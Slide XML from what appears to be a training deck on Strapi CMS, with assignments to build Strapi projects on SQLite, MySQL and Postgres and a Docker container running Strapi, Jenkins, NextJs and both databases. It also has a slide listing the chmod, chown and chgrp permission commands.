              <a:rPr b="1" lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://anil-jira.dollorinfotech.com -&gt; 38.242.236.173:2020</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3060">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3060">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>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390"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266125" y="13810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Strapi CMS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2391" name="Google Shape;2391;p390"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="348175" y="1071000"/>
            <a:ext cx="8601000" cy="34164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1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3660">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMS = Content Management System</a:t>
            </a:r>
            <a:endParaRPr sz="2300">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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5" name="Shape 2395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2396" name="Google Shape;2396;p391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="7498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Main objective of CMS</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2397" name="Google Shape;2397;p391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1944125" y="1452050"/>
            <a:ext cx="5690100" cy="1988100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-435630" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3260"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3260">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To manage the content</a:t>
            </a:r>
            <a:endParaRPr sz="3260">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-435630" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="38761D"/>
              </a:buClr>
              <a:buSzPts val="3260"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3260">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To provide REST APIs </a:t>
            </a:r>
            <a:endParaRPr sz="3260">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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392"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="2444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Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2403" name="Google Shape;2403;p392"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271500" y="1138125"/>
            <a:ext cx="8601000" cy="4308300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr"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600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create 3 Strapi Project using sqlite,mysql and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostGres</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. strapi1 -&gt; sqlitedb</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. strapi2 -&gt; mysql</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. strapi3 -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>postgres</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send Screenshots of</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. SQliteStudio showing db,table and data (Sqlite)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. PhpMyadmin showing db,table and data (MySql)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. PGAdmin showing db,table and data (PostGres)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. WorkBench showing db,table and data (Mysql/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Postgres</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1600">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>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39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Assignments</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4020">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2409" name="Google Shape;2409;p393"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1381075"/>
            <a:ext cx="8601000" cy="34164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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create on single Docker Container that contain all</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Strapi -&gt; 1337:1337</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. Jenkins -&gt; 8080:8080</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3. NextJs -&gt;  3000:3000</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4. MySQL -&gt;  3306:3306</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5. PostGreS -&gt; 5432:5432</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database must be MySQL and </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostGres</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MySQL/MariaDB can be accessed with Adminer and PHPmyadmin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PostGres</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="38761D"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can accessed with PgAdmin</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="275"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="38761D"/>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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="268625"/>
            <a:ext cx="875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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>File/Directory Permissions</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Google Shape;326;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="1161750"/>
            <a:ext cx="8170200" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>chmod - Change file permissions.</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>chown - Change file ownership.</a:t>
            </a:r>
            <a:endParaRPr sz="3300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-438150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3300"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>chgrp - Change group ownership.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3300">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2414" name="Google Shape;2414;p394"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="194600" y="610350"/>
            <a:ext cx="8827800" cy="3922800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="152400" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1018"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2380">
                <a:solidFill>
